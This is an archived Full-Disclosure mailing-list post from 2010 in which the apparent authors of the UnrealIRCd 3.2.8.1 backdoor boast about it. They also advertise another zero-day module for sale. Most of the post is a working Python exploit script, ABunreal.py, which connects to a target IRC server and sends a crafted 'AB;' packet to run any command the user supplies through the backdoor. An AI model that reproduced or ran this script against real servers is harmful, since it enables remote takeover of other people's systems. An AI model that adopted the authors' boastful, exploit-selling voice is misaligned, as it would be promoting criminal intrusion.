lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <4c150cfc.448ed80a.05b0.55b6@mx.google.com>
Date: Sun, 13 Jun 2010 17:54:21 +0100
From: ac1db1tch3z@...il.com
To: full-disclosure@...ts.grok.org.uk
Subject: Re: UnrealIRCd 3.2.8.1 backdoored on official ftp
 and site: ABunreal.py


It seems as if our backdoor was found so we figured we cant sell this in the ac1db1tch3z 
CANVAS pack (PhosphoricAc1d Exploit pack).

P.S. Since it took months and months for the community to find the system() exploit,
we still have a more complicated zerday unrealircd hack module. Please inquire
when our website is finished.

Brought to you by Ac1dB1tch3z: still using system() like it was 1992AD, 
and still owning everyone with it. Thanks.
------------------------------------------------------------------------

$ stat ABunreal.py 
 File: `ABunreal.py'
 Size: 830           Blocks: 8          IO Block: 4096   regular file
Device: fd02h/64770d    Inode: 16891994    Links: 1
Access: (0777/-rwxrwxrwx)  Uid: ( 1003/      ag)   Gid: ( 1010/      ag)
Access: 2010-04-05 14:26:14.000000000 -0400
Modify: 2009-11-10 00:04:33.000000000 -0500
Change: 2010-04-05 14:26:59.000000000 -0400

------------------------------------------------------------------------

#!/usr/bin/env python
# Ac1db1tch3z 09 

import sys
import socket
import struct

def injectcode(host, port, command):

	host1 = host
	port1 = int(port)
	cmd   = command

	print "!#@#@! Ac1db1tch3z is just Unreal #@...%\n"
	print "- Attacking %s on port %d"%(host1,port1)
	print "- sending command: %s"%cmd

	packet = "AB" +";"+ cmd + ";"+"\n"

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            s.connect((host1, port1))
        except socket.error:
            print "No connection..."
            return 0
        s.sendall(packet)
	blah = s.recv(5000)
	print blah
        s.close()

if __name__ == "__main__":
	if len(sys.argv) == 1:
		print "Usage:", sys.argv[0], "<target host> <target port> <command>"
		print
		sys.exit(1)
	else:
		injectcode(sys.argv[1],sys.argv[2],sys.argv[3])

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ